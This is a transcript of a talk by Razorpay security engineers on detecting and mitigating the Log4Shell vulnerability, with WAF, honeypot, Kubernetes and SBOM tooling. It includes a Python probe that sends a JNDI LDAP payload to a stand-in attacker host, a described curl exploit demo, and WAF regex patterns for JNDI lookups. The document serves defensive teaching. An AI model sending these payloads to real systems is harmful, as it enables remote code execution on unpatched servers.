Hi everyone, my name is Libin, and I'm joined by Sujith and Sri Harsha from Razorpay. We are DevSecOps engineers at Razorpay, and in this talk we'd like to discuss the Log4j vulnerability: how it affected us, what we did to mitigate it, the steps we took, and the lessons we learned, which anyone could use in a situation like this. To say a bit more about us: we are DevSecOps engineers at Razorpay working in different areas spanning development and operations. Next slide.

During this talk we'd like to cover what the Log4j vulnerability is, the nature of the vulnerability, the areas affected, how we mitigated it, the steps we took, the countermeasures we tried, and what worked and what didn't. Next slide.

To say a bit about our company: Razorpay is a fintech unicorn startup based out of India. We work in the neo-banking space, helping customers manage their finances efficiently while they focus on their business. To talk numbers and stats, we have roughly 600 engineers across many teams, 100-plus microservices added in the last year alone over a wide variety of tech stacks (Go, PHP, Python, Java, Node.js, pretty much anything you can name), and roughly 2,000 deployments per month. All these numbers are just to show how complex and fast-paced the infrastructure we had to keep up and running was while such a serious security vulnerability unfolded. Next slide.

So what is this all about? We have all heard about Log4j, unless you were away from it all for the last two or three months. Log4Shell is a vulnerability that surfaced around December 9 or 10 last year: a critical vulnerability in a popular Java logging framework called Log4j, and it causes an RCE, or remote code execution. Next slide.

As you have all seen, it affected many, many enterprise services all over the world, whether Amazon, Apple, IBM, or Juniper. The funny thing about this is that we normally use a logging library to record information about an application, in some cases precisely to know that an attack or an exception occurred. This vulnerability affects the logging library itself, so if whatever you log contains a malicious payload, the very library you rely on hands the attacker an RCE. That's why the memes are out there. Next slide.

So what is this about? This particular CVE, CVE-2021-44228, was first disclosed around December 10 last year. It causes an RCE in the Log4j library and was nicknamed Log4Shell. What it enables an attacker to do is remote code execution: they can send a particular pattern of payload to a service and execute code on that service, harming availability, running malicious code that brings down the server, exfiltrating data, you name it. But why is it such a serious issue? This is not the first critical vulnerability we have seen, so let's look at why this one stands out. Next slide.

We'll talk about four attributes of this particular vulnerability. The first is impact. Unlike many previous vulnerabilities, Log4j is used by millions of pieces of software across the internet; most Java-based applications use Log4j as their logging library. The second is criticality: this vulnerability causes an RCE that lets an attacker execute code on a server with very little technical knowledge and no other preconditions, which is why it was given a CVSS score of 10. The third is ease of exploitation: it's a very simple attack. You can send a very simple payload in any request, in its headers or body or anywhere else, and if that message is logged by a vulnerable library, the exploit fires.
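(To make the ease of exploitation concrete, here is a minimal illustrative probe in Python. The header names, target URL, and callback host are placeholders rather than the speakers' actual demo values, and it should only ever be pointed at systems you own.)

```python
# Illustrative Log4Shell probe: one ordinary HTTP request is all it takes.
# Placeholder values throughout; run only against your own test systems.
import requests

CALLBACK = "attacker.example.com:1389"   # hypothetical attacker-controlled LDAP endpoint
TARGET = "http://localhost:8080/"        # hypothetical vulnerable service

# Log4j's message-lookup substitution resolves this JNDI URL when the
# string is logged, fetching attacker-controlled code from the LDAP server.
payload = "${jndi:ldap://" + CALLBACK + "/a}"

resp = requests.get(
    TARGET,
    headers={"User-Agent": payload, "X-Api-Version": payload},  # header names are arbitrary
    params={"q": payload},  # query parameters and body fields work just as well
    timeout=5,
)
# The HTTP response is irrelevant: the exploit fires server-side the
# moment a vulnerable Log4j version logs any of these fields.
print(resp.status_code)
```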
Its simplicity made it very script friendly, and a lot of people started using it; we saw a lot of noise and attack patterns across the internet. The last attribute is the availability of POCs. Soon after the vulnerability was first disclosed, we observed a lot of POCs out on the internet, which helped people create botnets, and a lot of attack patterns were published and then used by script kiddies all over the world to attack services everywhere. All four of these factors combined make this a very serious, very critical issue: as soon as the vulnerability was disclosed, we started seeing servers getting hit everywhere, with people reporting disrupted services, data being exfiltrated, and so on. Next slide.

So what is Log4j? Log4j is a project from the Apache Software Foundation. It's an open-source logging framework used by millions of services out there, mostly Java-based applications. Next, a little bit of technicality: Log4j supports a lookup feature built on JNDI, the Java Naming and Directory Interface. Why should we know about it? We'll look at that in the next slide. Next slide, please.

JNDI is an API for Java applications to interact with remote objects registered with, say, an RMI registry or a service like LDAP. JNDI helps any Java application access these services remotely and fetch the classes or objects it needs. Now, why is that an issue? Because from any Java application, you can use JNDI to call services like DNS, LDAP, NIS, and many more. Log4j uses this lookup in its message processing, meaning from within Log4j you can call out to other services, most notably LDAP. Why this is important, you will see in our demo shortly. Let me walk you through the timeline of Log4j next.

Now that we know a little about the Log4j library, what the vulnerability is, and how it affects everything, let's see what happened during the period when the vulnerability was discovered. At first, the issue was reported as a denial-of-service vulnerability of moderate severity, with a score of 3.7. Around December 10, researchers were able to develop the attack further into an RCE, causing a new CVE to be reported, which escalated the score from 3.7 to 10, and the Apache Foundation immediately released the first patch, 2.15. Soon after that patch, researchers found a further vulnerability, which led to the release of 2.16, then another that led to 2.17, and soon after yet another that led to 2.17.1. So it was not just one vulnerability that was reported but a series of them, causing multiple patches from 2.15 to 2.17.1 over a period of about two weeks. From the perspective of the teams consuming this library, we didn't have to upgrade just once; we had to upgrade three times to have mitigations in place. Next slide. Now let me walk you through what happened around that time at Razorpay.
Around December 10, we first started observing reports of a zero-day vulnerability in the Log4j library, and soon after, we saw a spike in our traffic: a lot of anomalous, invalid requests being sent to us. We immediately formed a war room (I think all of us did) to analyze this traffic, and we soon confirmed that these were indeed Log4j payloads being sent to us. Like every other team, we first applied the managed WAF rule set; AWS released a rule set that mitigates this particular vulnerability. But soon after, we figured out that this managed rule set didn't work for us: it was blocking certain legitimate traffic, and it was also failing to block traffic carrying newer payload variants. So we switched from the managed rule set to a custom rule set, and we kept modifying these rules with updated patterns so that they mitigated the new payloads and variants while still allowing our legitimate business traffic through. Around the same time, we also started looking at the assets we have, meaning how we were exposed to this vulnerability. We run a lot of services across different landscapes, so we wanted to know how many of our services were actually impacted by this particular vulnerability, and we had very little time to do it. Next slide.

Now, about finding Log4j: it's not really that easy to figure out whether an application is using Log4j directly, whether it's using it indirectly, or whether one of your third parties is using it. So without further ado, we immediately patched all of our servers with the first mitigations that were released; there was no time to manually verify which services were affected, so we applied the mitigations everywhere. At around the same time, we started updating our WAFs with honeypot data; why that's important will be discussed further down. And soon after rolling out the mitigations, we started tracking patches using our asset inventory. A bit more about the asset inventory will be explained in later slides; in short, it helps us identify which assets use which components and how they map to different infrastructure components. After that, we started the long journey of patching all our services that were vulnerable to this particular attack.
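(To make the identification problem concrete, here is a rough sketch of the kind of host sweep many teams used to find vulnerable Log4j copies: it flags any jar that still ships the JndiLookup class. This is illustrative, not Razorpay's actual tooling, and it does not handle shaded or nested fat jars.)

```python
# Sweep a directory tree for jars that still contain Log4j's JndiLookup
# class, i.e. copies that early mitigations did not strip out.
import os
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def scan(root):
    """Yield (jar_path, version) for every jar that still ships JndiLookup."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with zipfile.ZipFile(path) as jar:
                    entries = jar.namelist()
                    if JNDI_CLASS not in entries:
                        continue  # patched (class removed) or not log4j-core at all
                    version = "unknown"
                    for entry in entries:
                        # log4j-core jars carry their version in pom.properties
                        if entry.endswith("log4j-core/pom.properties"):
                            for line in jar.read(entry).decode().splitlines():
                                if line.startswith("version="):
                                    version = line.split("=", 1)[1]
                    yield path, version
            except zipfile.BadZipFile:
                continue  # not a readable jar; skip

if __name__ == "__main__":
    for path, version in scan("/opt"):  # hypothetical application root
        print(f"possibly vulnerable log4j: {path} (version {version})")
```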
Next, we'll see a demo of how this attack works. For that, I'll hand it over to my colleague Sujith. Sujith, all yours.

Thanks, Libin. So, Libin explained how the attack started and how it progressed; now let's look into how the attack works, on the technical side. We have a small chart that shows the attack sequence. It starts with identification of a vulnerable service: the attacker scans the internet looking for services that use Log4j. Once one is identified, the attacker sends malicious payloads to the server in the request, in the form of headers or query parameters. As you can see in the diagram, below the second entity there is a request highlighted in red; that is what the payload looks like. Once it is sent, the victim server logs this particular request using Log4j, and here is where the vulnerability lies: when the message is logged, Log4j queries the malicious LDAP server whose address the attacker embedded in the payload. The LDAP server in turn responds to the victim server with a malicious Java class, which is then executed. That's the exploit.

With that picture in mind, we have a small demo of how the attack works. If you look at this screen, we have two terminals running. On the left is the victim, a vulnerable server that uses Log4j. On the right, you can see an LDAP server running; this is a malicious LDAP server under the attacker's control. Since this is an RCE, we need a way to see the code execution, so we are also running a listener for ICMP packets on this interface, while the vulnerable application using Log4j runs on localhost:8080. The attack itself is just the attacker sending a request to the vulnerable server. In the terminal on the right, we send a curl request to localhost:8080, the vulnerable server, and we add a header whose value carries the Log4j payload. The payload contains an LDAP URL pointing to the attacker-controlled LDAP server, with a command embedded in it. At the end of the payload there is a Base64-encoded portion, which pings the listener running on 192.168.56.10. As soon as we send this request with curl, we can observe on the left side of the screen that we start getting hits: the payload worked, and our listener starts receiving pings. Just to drive the point home, we log into the vulnerable server using docker exec so we can see exactly what is happening, and a simple ps shows that a ping to that particular IP is running. This confirms there was code execution on the victim server.
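(As a stand-in for the listener used in the demo, here is a minimal Python sketch that prints any ICMP echo request it receives: if the injected ping runs on the victim, its packets show up here. This is an illustrative reconstruction rather than the speakers' exact setup; raw sockets need root, and the details vary slightly by OS.)

```python
# Minimal ICMP listener: confirms remote code execution when the
# victim's injected `ping` starts hitting this host. Requires root.
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp"))
print("listening for ICMP echo requests ...")
while True:
    packet, (src, _unused) = sock.recvfrom(65535)
    ip_header_len = (packet[0] & 0x0F) * 4  # IHL field, in 32-bit words
    icmp_type = packet[ip_header_len]       # first byte of the ICMP header
    if icmp_type == 8:                      # type 8 = echo request
        print(f"ping received from {src}: code execution confirmed")
```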
Coming back to the slides: we have seen how the attack works, so let's move on to how we responded. We had a three-step process: short-term, medium-term, and long-term. In the short term, we concentrated on WAF updates, meaning updating WAF rules, and on adding environment variables to containers, which will be covered in detail in later slides. In the medium-term response, we used data from a honeypot, which again we'll go into in depth, and we ran attack simulations. And the long-term response was upgrading the affected versions, the actual dependency updates. Moving on.

Our first short-term response was the WAF, basically our first and earliest layer of defense. A few things to say about the WAF: we initially went with the AWS managed WAF rules, which did not work well for us, as they were very generic and blocked some of our legitimate traffic. As a result, we had to move to a custom rule set, where we constantly and manually updated the rules as our defense. We were getting the payloads and bypasses from a few online resources, such as Twitter and blogs, and one of our major sources was SANS, specifically a honeypot set up by SANS. This slide shows what our WAF rules looked like and how they were updated; these were the rules we were using.

Moving on to updating WAF rules with honeypot data: why did we end up here? There were a lot of bypasses. Considering that a WAF uses patterns to detect payloads, there will always be new bypasses coming, and since we were initially relying on the WAF, we had to actively look for them. Based on the payloads and bypasses we found, we added custom WAF rules to block the malicious traffic. For this, we used data from the SANS honeypot: SANS had set up a honeypot that was collecting a lot of data on payloads and bypasses. To say a little about honeypots: they are systems used to lure attackers so you can gain insight into their hacking attempts, basically collecting data on what kinds of attacks, payloads, and patterns are being used. That data was accessible through publicly available APIs, covering all kinds of attacks, payloads, and bypasses. We had a simple setup where we polled the SANS honeypot every 15 minutes to check for new payloads and bypasses, and whenever there was a new bypass, we got an alert in Slack. Each newly fetched payload or bypass was sent to our WAF rule checker, which validated it against our rules; if it passed through our WAF rules, meaning it was a bypass, we got an alert in our Slack channel, and the rules were then manually reviewed and updated. This helped us keep up with the different payloads and bypasses and keep the WAF current; a sketch of the loop follows.
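(Here is a simplified sketch of that polling loop. The feed URL, Slack webhook, and regex rules are placeholder stand-ins for the real SANS API and AWS WAF rule set; the point is the shape of the pipeline: fetch, test against the current rules, and alert on anything that slips through.)

```python
# Poll a honeypot feed for fresh Log4Shell payloads, replay them against
# simplified stand-ins for our WAF rules, and alert on bypasses.
import re
import time
import requests

FEED_URL = "https://honeypot.example.com/api/log4j-payloads"      # hypothetical feed
SLACK_WEBHOOK = "https://hooks.slack.com/services/T000/B000/XXX"  # hypothetical webhook

# Stand-ins for WAF rules: regexes over the raw payload string.
WAF_RULES = [
    re.compile(r"\$\{jndi:", re.IGNORECASE),
    re.compile(r"\$\{\s*\$\{", re.IGNORECASE),  # nested-lookup obfuscation, e.g. ${${lower:j}ndi:
]

def blocked(payload: str) -> bool:
    return any(rule.search(payload) for rule in WAF_RULES)

seen = set()
while True:
    # Assumes the feed returns a JSON list of payload strings.
    for payload in requests.get(FEED_URL, timeout=10).json():
        if payload in seen:
            continue
        seen.add(payload)
        if not blocked(payload):
            # A payload the current rules would let through: alert for manual review.
            requests.post(SLACK_WEBHOOK, json={"text": f"WAF bypass candidate: {payload!r}"})
    time.sleep(15 * 60)  # poll every 15 minutes, as described in the talk
```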
Beyond the WAF, we also wanted to run these payloads internally against our own servers, to check for any vulnerable servers, basically to simulate attacks. We had a setup with one attack machine and a DNS server, and we used canary tokens to look for responses or feedback. We started sending the payloads to all of our endpoints as part of URL parameters, headers, and request bodies, and our DNS server would send an alert whenever it received a hit. That is how it worked, and we monitored this internally to check for any vulnerable servers and services that were present. Moving on, our colleague Harsha is going to take over for the other protection measures and responses we had. Over to you, Harsha.

Thanks, Sujith. Like Sujith explained, we had multiple layers of defense at the WAF layer to prevent our systems from getting exploited. Now, let's go a little deeper, towards the application side. As a short-term solution, one of the mitigation measures we took was to patch all our systems, the workloads, the deployments, the cron jobs, with the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS set to true. As Libin mentioned in one of the previous slides, we make around 2,000 deployments per month. That's a really high number, and there was a very good chance that the environment variables we injected into the deployment manifests would get overridden, and freezing deployments is not something we wanted to do. So, to avoid hurting developer productivity while still ensuring that these applications are not vulnerable to this attack, we came up with a solution using Kubernetes dynamic admission controllers. To give a rough idea of what admission controllers are: an admission controller is nothing but code that intercepts requests made to the Kubernetes API server; it sits between the requester and the API server. And what exactly did our mutating admission controller do? Like the name says, whenever there was a create or update event, the controller made sure the objects were created with this environment variable injected into them. This diagram shows how a request reaches the Kubernetes API server, where the admission controller code sits, and how it injects the environment variables.
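(For the curious, here is a minimal sketch of such a mutating webhook in Python/Flask. It is an illustration under assumptions, not Razorpay's actual controller: TLS configuration, namespace filtering, and failure policy, all essential in production, are omitted.)

```python
# Mutating admission webhook that injects LOG4J_FORMAT_MSG_NO_LOOKUPS=true
# into every container of every admitted Pod.
import base64
import json
from flask import Flask, request, jsonify

app = Flask(__name__)
ENV_VAR = {"name": "LOG4J_FORMAT_MSG_NO_LOOKUPS", "value": "true"}

@app.route("/mutate", methods=["POST"])
def mutate():
    review = request.get_json()
    pod = review["request"]["object"]
    patch = []
    for i, container in enumerate(pod["spec"].get("containers", [])):
        env = container.get("env")
        if env is None:
            # No env list on this container yet: create one with our variable.
            patch.append({"op": "add",
                          "path": f"/spec/containers/{i}/env",
                          "value": [ENV_VAR]})
        elif all(e.get("name") != ENV_VAR["name"] for e in env):
            # Append to the existing list ("-" means end-of-array in JSONPatch).
            patch.append({"op": "add",
                          "path": f"/spec/containers/{i}/env/-",
                          "value": ENV_VAR})
    return jsonify({
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "response": {
            "uid": review["request"]["uid"],
            "allowed": True,
            "patchType": "JSONPatch",
            "patch": base64.b64encode(json.dumps(patch).encode()).decode(),
        },
    })
```

Registered through a MutatingWebhookConfiguration pointed at /mutate, every new Pod picks up the variable even when a deployment manifest omits or overrides it.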
Moving on to the long-term solutions: one long-term solution to ensure that applications are not vulnerable to this attack is, obviously, to upgrade them if they have vulnerable Log4j dependencies. Now the interesting piece: the Log4Shell attack can be carried out even if an application pulls in Log4j as a third-, fourth-, or ninth-level transitive dependency. So how do we identify the applications that have direct or indirect Log4j dependencies? For this, we initially took the help of Dependabot. What is Dependabot? Dependabot is an OSS scanner that compiles all open-source dependencies across the repositories in the organization. It helped us identify the vulnerable Log4j dependencies in our code, and we initially used it to identify the applications vulnerable to Log4Shell. We also made use of Syft, an open-source tool that helped us generate SBOMs from our container images. Basically, these two tools helped us identify Log4j dependencies both in the applications and in the container images.

There's an interesting thing I would like to speak about here: the Razorpay asset inventory. It turned out to be our silver bullet in identifying production systems affected by and vulnerable to the Log4Shell attack. It helped us identify the container images, the applications, the owners, and the mappings between them. We have a tool that gives us information about all the assets in our company and the relations between them, and having such an inventory in a company with hundreds of microservices, and being able to quickly identify the owners, helped us incredibly well in upgrading our systems as quickly as we could. If you're interested in knowing more about what exactly this tool is and what these assets are, there's another talk from Satyaki and Sandesh from the Razorpay security team about the asset inventory project at Razorpay; you can follow the link below to know more.

So, we put some short-term solutions and some long-term solutions in place to prevent this attack. Are these defenses enough to stop it? No, because we use many third-party applications, directly or indirectly, that may run vulnerable Log4j versions. For example, we use Looker, Neo4j, and Redis Labs, and the problem is that we do not have sufficient control over what a third-party provider runs, whether on our systems or on theirs. For this, the only solution we had was to keep track of the vendors, the upstream providers, and have back-and-forth communication with them to check whether their systems were updated so they would not log any of these Log4j attack payloads. Our major provider, AWS, also kept us posted on how they patched their systems and which of their services were affected. And coming to the third-party dependencies in our images, we made use of Grype, which scans the contents of a container image to find known vulnerabilities in the major operating systems and in language-specific packages. You can go to the next slide.

So what next? We had plans for prevention; the next important thing that comes into the picture is monitoring, specifically monitoring egress traffic, and I'm going to explain how exactly we went about that during the Log4j period. We gathered a threat list of IPs from various sources like SANS and CrowdSec, and we closely monitored whether any of our systems were interacting with IPs on that list. Since we mostly run on AWS, we took the help of AWS Detective's IP address analytics to figure out whether there was any interaction between our systems and the threat-listed IPs. As you may already know, Detective takes its feeds from VPC flow logs and CloudTrail events, so it helped us determine whether there were any interactions with the gathered list of IPs. We also ensured that this list of IPs was continuously updated with some custom scripts. You can go to the next slide.
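(Here is a sketch of what such a refresh-and-check script can look like. The feed URLs are placeholders, and in practice the heavy lifting of matching was done by AWS Detective over VPC flow logs rather than by hand-rolled code like this.)

```python
# Keep a threat list of IPs fresh from public feeds, then flag any
# egress flow whose destination is on the list.
import requests

THREAT_FEEDS = [
    "https://feeds.example.com/log4j-scanners.txt",      # hypothetical SANS-style feed
    "https://feeds.example.com/crowdsec-blocklist.txt",  # hypothetical CrowdSec-style feed
]

def refresh_threat_ips() -> set:
    """Fetch every feed (one IP per line, '#' for comments) into one set."""
    ips = set()
    for url in THREAT_FEEDS:
        for line in requests.get(url, timeout=10).text.splitlines():
            line = line.strip()
            if line and not line.startswith("#"):
                ips.add(line)
    return ips

def flag_egress(flow_records, threat_ips):
    """flow_records: iterable of dicts with a 'dstaddr' key, VPC-flow-log style."""
    for rec in flow_records:
        if rec["dstaddr"] in threat_ips:
            yield rec  # a workload talked to a known-bad IP: investigate

if __name__ == "__main__":
    threat_ips = refresh_threat_ips()
    sample = [{"srcaddr": "10.0.1.5", "dstaddr": "203.0.113.9"}]  # synthetic record
    for hit in flag_egress(sample, threat_ips):
        print("suspicious egress:", hit)
```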
So what went well for us? Having the asset inventory, SBOM tooling, and the rest already in front of us, and using them to quickly identify application owners and upgrade applications on a war footing, really turned out to be a silver bullet. Our defense-in-depth mechanism also helped us reduce the attack surface. Our web application firewall, the first layer of defense we put up, blocked a ton of Log4j payloads from entering our systems. Next, we patched all our deployments with the environment variable so that they do not make JNDI lookups. Next, we upgraded each of the applications that had dependencies on vulnerable Log4j versions. And finally, having custom-built WAF rules that understand the business context also proved very helpful, as our firewall rules managed to block more attack traffic than some of the managed WAF rules provided by third parties.

Thanks, Libin, Sujith, and Sri Harsha for an amazing discussion around this. I think the point about the software asset inventory, which is generally not very exciting for security folks, turning out to be a real key element during these times was a great message. One of the things I was thinking about while listening to your talk was those couple of weeks and what a roller coaster they were, and of course some of the months that followed. But this is quite ingenious, so I'm pretty excited about this topic and I loved the session. I had a couple of questions myself; maybe I'll start with one of those. You were talking about assets, right? You started looking at how many assets were impacted. What can you do about the infrastructure components that are affected where there may be a dependency on a third party to upgrade? How do you tackle that, or what do you think is the best way to tackle it in such a scenario? Sandesh, do you want to take this question?

Sure. I worked on this with Sri Harsha as well. That was a much longer drawn-out process than fixing our own systems. For one, it was not always clear whether Log4j was used by all our third parties. We knew which of them used Java and which didn't, so we had a fair idea of whether they would be relevant or not. We then had to reach out to our vendors to figure out whether they were using Log4j, and then figure out whether there was an update, and so on. Some vendors, I must say, were extremely proactive: they actually sent us things even before we asked them, which was great. Even while we were firefighting, we had some vendors reach out and say, hey, our services are vulnerable, here's what you need to do to upgrade, and in the meantime, here's what you can do to stay safe. So that was great. But with one or two vendors in particular, and I don't want to name anyone, it was a long drawn-out battle. And one thing we realized, which goes back to security hygiene in general, is that if you're using older versions of a particular product and you haven't upgraded for regression reasons or whatever else, that's exactly when something like Log4j comes back to bite you. Now you don't want to upgrade to the latest version because it'll break a bunch of stuff, but at the same time, you can't not upgrade, because you're vulnerable to Log4j. So this was a good lesson for us on why you need better patch hygiene in general. By and large, I think it was okay, a long drawn-out process, but fine. There were definitely one or two instances, though, and I can see Harsha smiling because he handled some of them, where it went on for a really long time.
Meanwhile, we were holding out with the WAF rules and everything. Yeah, and as a security team, I would add that you also grow with the vulnerability. When the vulnerability kept evolving and, with 2.16, there was again another issue, we went ahead and patched that as well. So you gradually grow into that patience. You grow old, actually. Good point.

Another question while we gather some of the others: we heard a lot about what security teams can do, including some of the alternate controls that could be applied for a vulnerability like this, solutions like the WAF and other things, which you clearly called out. Looking back, is there one thing you could tell the developers, maybe all the developers in the audience watching us, about what they can do to be prepared for zero-days like this?

If Libin were here, he would have answered this, because it's part of his daily job, but he had to step out for a personal emergency. So, from a developer's perspective, there are a few things. At least within Razorpay, we rely on open-source scanning tools like Dependabot, and we also use Grype in multiple cases. So we have an SBOM, which basically gives you the list of all the dependencies you're using and also tells you which of them are vulnerable. Now, the problem with the current technology is that it's not always clear whether you're actually using the vulnerable part of a vulnerable library, so sometimes it becomes hard to know whether you're truly exposed or not. But as hygiene, if you can make sure you're aware of what open-source software you're using and keep it upgraded to the latest version, that solves it. That's much easier said than done; it's very easy for us to say and much harder to actually get done. From a security perspective, the way we help developers is to at least make it very easy for them to know which repos have which vulnerabilities, which open-source packages are affected, and where the instances are. What would be really nice is if someone could come up with technology, or a way of saying: you're using a particular library that has a vulnerability in, say, function X, and since you're not calling that function, you don't have to worry, or since you are calling it, you have to act. Then the signal-to-noise ratio becomes much better. But I don't know of a tool that does that very well, and doing it manually does not scale, so there's a pain point there. So, if developers are watching: first of all, thank you for all the help. But more than that, if your security model has an SBOM and open-source scanning, use it; if not, there are plenty of open-source tools available, like Grype, from, I forget the name of the company, and also OWASP Dependency-Check from OWASP. There are a few open-source tools that do it. You can run a scan, get a list of all your vulnerable dependencies, and make sure everything is updated. That's cool.
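(As an editorial illustration of the scan-and-list workflow described above, here is a small wrapper that runs Grype against an image and surfaces Log4j findings. It assumes the grype CLI is installed, and the JSON field names reflect Grype's commonly documented output schema, which may vary across versions.)

```python
# Run Grype on a container image and print any Log4j-related findings.
import json
import subprocess
import sys

def log4j_findings(image: str):
    out = subprocess.run(
        ["grype", image, "-o", "json"],   # assumes the grype CLI is on PATH
        capture_output=True, text=True, check=True,
    ).stdout
    for match in json.loads(out).get("matches", []):
        artifact = match["artifact"]          # the package Grype matched
        if "log4j" in artifact["name"]:
            vuln = match["vulnerability"]     # the CVE/GHSA it matched against
            yield artifact["name"], artifact["version"], vuln["id"], vuln["severity"]

if __name__ == "__main__":
    for name, version, cve, severity in log4j_findings(sys.argv[1]):
        print(f"{name} {version}: {cve} ({severity})")
```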
If you can integrate that with your CI/CD pipeline, even better. Even that first stage of getting visibility can itself be a struggle when things aren't well organized, so getting that visibility, and having automation around dependencies: those two things will make everyone's life much easier. That's a great message there. Thanks. Thanks, Sandesh. And thanks a lot to all our speakers for the sessions today. This marks the end of our three-part series on risk assessment and mitigation with Razorpay.